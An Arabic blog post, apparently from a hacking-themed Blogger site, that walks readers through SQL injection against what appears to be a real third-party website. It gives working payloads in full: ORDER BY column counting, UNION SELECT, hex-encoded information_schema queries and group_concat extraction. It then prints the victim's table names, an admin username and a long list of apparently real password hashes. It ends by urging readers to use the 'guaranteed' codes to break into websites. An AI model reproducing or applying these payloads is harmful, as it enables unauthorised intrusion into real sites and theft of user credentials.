Posted by : Unknown الثلاثاء، 4 مارس 2014



start
بعد أن جلبنا الموقع المستهدف .. كيف نعرف انه مصاب
['] نعرف انه مصاب بوضع هذه العلامة في آخر الرابط [']
نتابع كيف

طيب زي ماانتم شايفين

Error in query: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '\' AND
valid = '1' AND id < 2000 order by c_id' at line 1

 إذاً الموقع مصاب بثغرة sql

الان امر استخراج الاعمده
+order+by+1--
كما ترون اختفى الخطأ خلونا نزيد إلى 100
+order+by+100--
كما ترون رجع الخطأ خلونا ننقص إلى
+order+by+16--
الخطأ ما زال خلونا ننقص إلى
+order+by+15--
حسناً الان تبيّنا لنا ان عدد الأعمده هو 15 عامود

الان نكتب هذا الأمر لأستخراج الأعمده المصابة
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

[-] وما ننسى هذه العلامة قبل الرقم

9-12 حسنا الان ظهرت لنا الأعمده المصابة
9 حسناً الآن سنستخدم العامود

هُنا أرجو التركيز

نبدأ بـِ
database() امر استخراج اسم القاعدة ويوضع في مكان العامود المصاب

[ anakonda_humor2 ] هذا هو اسم القاعدة

الان لا بد من تشفير اسم القاعد يتم التشفير عبر هذا الموقع

http://www.waraxe.us/sql-char-encoder.html

0x616e616b6f6e64615f68756d6f7232

الان تم التشفير

لماذا نشفر اسم قاعدة البيانات ؟.. يتم تشفير اسم قاعدة البيانات ليستطيع الموقع التعرف
على الامر.


Group_Concat(Table_name) الان نضع هذا الكود في العامود المصاب


الان نضع هذا الكود في آخر الرابط ,, ونضيف في آخر الكود اسم قاعدة البيانات المشفر
+from+information_Schema.tables+where +table_schema+like+
0x616e616b6f6e64615f68756d6f7232


 ها هيَ الجداول
Adventures,AdventuresMembers,AdventuresSuggestions,AdventuresText,Astro_Animals,
Astro_Elements,Astro_Match,Astro_Signs,BlogComments,BlogEntries,BlogSubscribers,
Blogs,ComicsMosad,DidYouKnow,
ForumMessages,ForumTopics,Humor
,IP,Members,PollQuestions,Polls,Reshimot
,Reshimot_Lines,Tgoovot,active_guests
,active_users,admin,articles,banned_users,ba



بعد ضهور الجداول التي يوجد بداخلها اليوزر والباس الخاص في الادمن
نبحث عن اسم الادمن بين الجداول
مثآآل
;admin; وهي تعني اسم الادمن + وهي تخص في ايجاد اليوزر والباس
;Administrator; وهي ايضاً تخص الآدمن + وهي تخص في ايجاد اليوزر و الباس
;Users ; وهي ايضاً تخص في ايجاد اليوزر و الباس
;Adm; وهي ايضاً تخص في ايجاد اليوزر والباس
; Auteurs; وهي تعني محرر + وهي تخص في ايجاد اليوزر والبآآس


حسنا بعد التعرف على ملفات الادمن يتم تشفير إحدى
هذه الكلمات ليتقبّلها الموقع المستهدف نتابع كيف سنستخرجها من الجداول وتشفيرها

حسناً وجدنا في الجداول هذا الملف و سنشفره
users





حسنا الان نريد إظهار الأعمدة وليس الجداول


نكتب هذا الكود في العامود المصاب
Group_Concat(Column_name)

نكتب هذا الكود في نهاية الرابط مع العلم
ان هذا الرقم المشفر هو اسم الادمن الذي شفرناه الذي يحتوي على اليوزر والباس
+from+information_Schema.Columns+where+table_name+like+0x7573657273--


ملاحضة !!
نلاحظ ان كود العامود المصاب تغيير من
Group_Concat(table_name)
إلى
Group_Concat(column_name)



الان ظهرت لنا العواميد ما يهمنا منها الا اليوزر نيم و الباسوورد
username,password,userid,userlevel,email,timestamp



الان نريد استخراج اليوزر والباس وهي آخر مرحله في الحقن

(username) نضع هذه الكلمة وهي يوزر نيم بدلاً من كلمة
[column_name] في العامود المصاب
 +from+users-- ونضع هذا الكود في آخر الرابط لأستخراج اليوزر






[111] الان ظهر اليوزر وهوَ


username الان سنظهر الباس بتبديل كلمة
password بكلمة

تابعو كيف

طيب هذي باسات مو باس واحد فقط وكلها مشفره
5e83e8e8a6b5ffeff1f69aff011ea1f8
,e4676d6bac75c3512bf8860b75ffe70f
,d08be11264c4d21568068ce12541d768,
5e83e8e8a6b5ffeff1f69aff011ea1f8,
759b6fea1788f4a4765ba0e082c3a700,
5884d06de086a31d875874f670a39cd0,
199d8ec42da9c9b204872c5d8cdc51e1,
4d4098d64e163d2726959455d046fd7c,
285fc095262479a9f230ac32122c50ca,
38697e1e185cb02fca2d0f9b04c214dc,
bd73c2878f3eaa023f8c817dffa484ef,
4820cedb76ea10203e816dd438834871,
9bf6e7ff321f04a76c9078c32c9e91dc,
87aac78d7f230c037dfc7f304f20b987,
6d276e1854d4576cebda473d79ed5bc2,
0b98463d9854f588e5e98113cf53c41a,
b6354798e19fcb6f76deac7f803e9e1a,
7ce544c6473d8a7ad8b0ade74b091089,
303160624bc0b8d5d13bd325f614130f,
b5f76ca1107df79c2a1a4714f38ef808,
c62f505c0280042855b114e1cd52addc,
e14530fbe835b751f2ce8f3e392f9dd9,
4dd09a6055f0e373f3f6803131483a3f,
9b6c8eb0d3a04cf6a509be802fbb445a,
19e2001699525e3c13ddf131ce6739d5,
203e7af33763e930ed49f1f9dd424730,
c55341dcd4e1ec26d157a653611f7c11
1f1767b5696e79116b11ecc7f2882783,
4f0a3bd0ffb3b503ead445edf16aee9f,
d458b7a2ab0ac561518460c324742cc2,
ملاحظة!!

بعض المواقع يكون للآدمن باسووردات كثيرة مثل هذا الموقع
وبعض المواقع لن تجد سوى باس واحد ويمكن حتى ما يكون مشفر
أتمنى وصلت الفكرة :)


اتمنى تقدير تعبي في هذا الدرس وأتمنى أنني أفدتكم ولو بالقليل


ملاحظة !!
[%100] الأكواد المستخدمة في الشرح مضمونة

وأفضل أن تستخدمها أنت في رحلتك في إختراق المواقع بثغرة[sql]
--------------------------------------------------------------



في امان الله

ضع تعليق

اشترك | اشترك للتعليقات

Popular Post

Blogger templates

أقسام المدونة

قائمة المدونات الإلكترونية

تابعنا على الفيسبوك

https://www.facebook.com/pages/Hamzapro3/1492091174356542?skip_nax_wizard=true

عن موقع أوبنتو العرب

إجمالي مرات مشاهدة الصفحة

أخبار ريال مدريد

هل اعجبكم الموضوع لاتنسو مشاركتنا تعليقاتكم

هل اعجبكم الموضوع لاتنسو مشاركتنا تعليقاتكم

    المتابعون

    تعديل

    we are anonymous

    http://hamzapro3.blogspot.com/

    http://hamzapro3.blogspot.com/

    تعديل

    hack world

    2

    2

    http://hamzapro3.blogspot.com/

    http://hamzapro3.blogspot.com/

    تابعنا ع الفيس بوك

    أقسام المدونة

    hamza kambouch

    القائمة البريدية

    المشاركات الشائعة

    hack

    تعديل

    يتم التشغيل بواسطة Blogger.

    http://hamzapro3.blogspot.com/

    المشاركات الشائعة

    المواضيع النشطة

    - copyright © worldprofessional -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan custom blogger templates -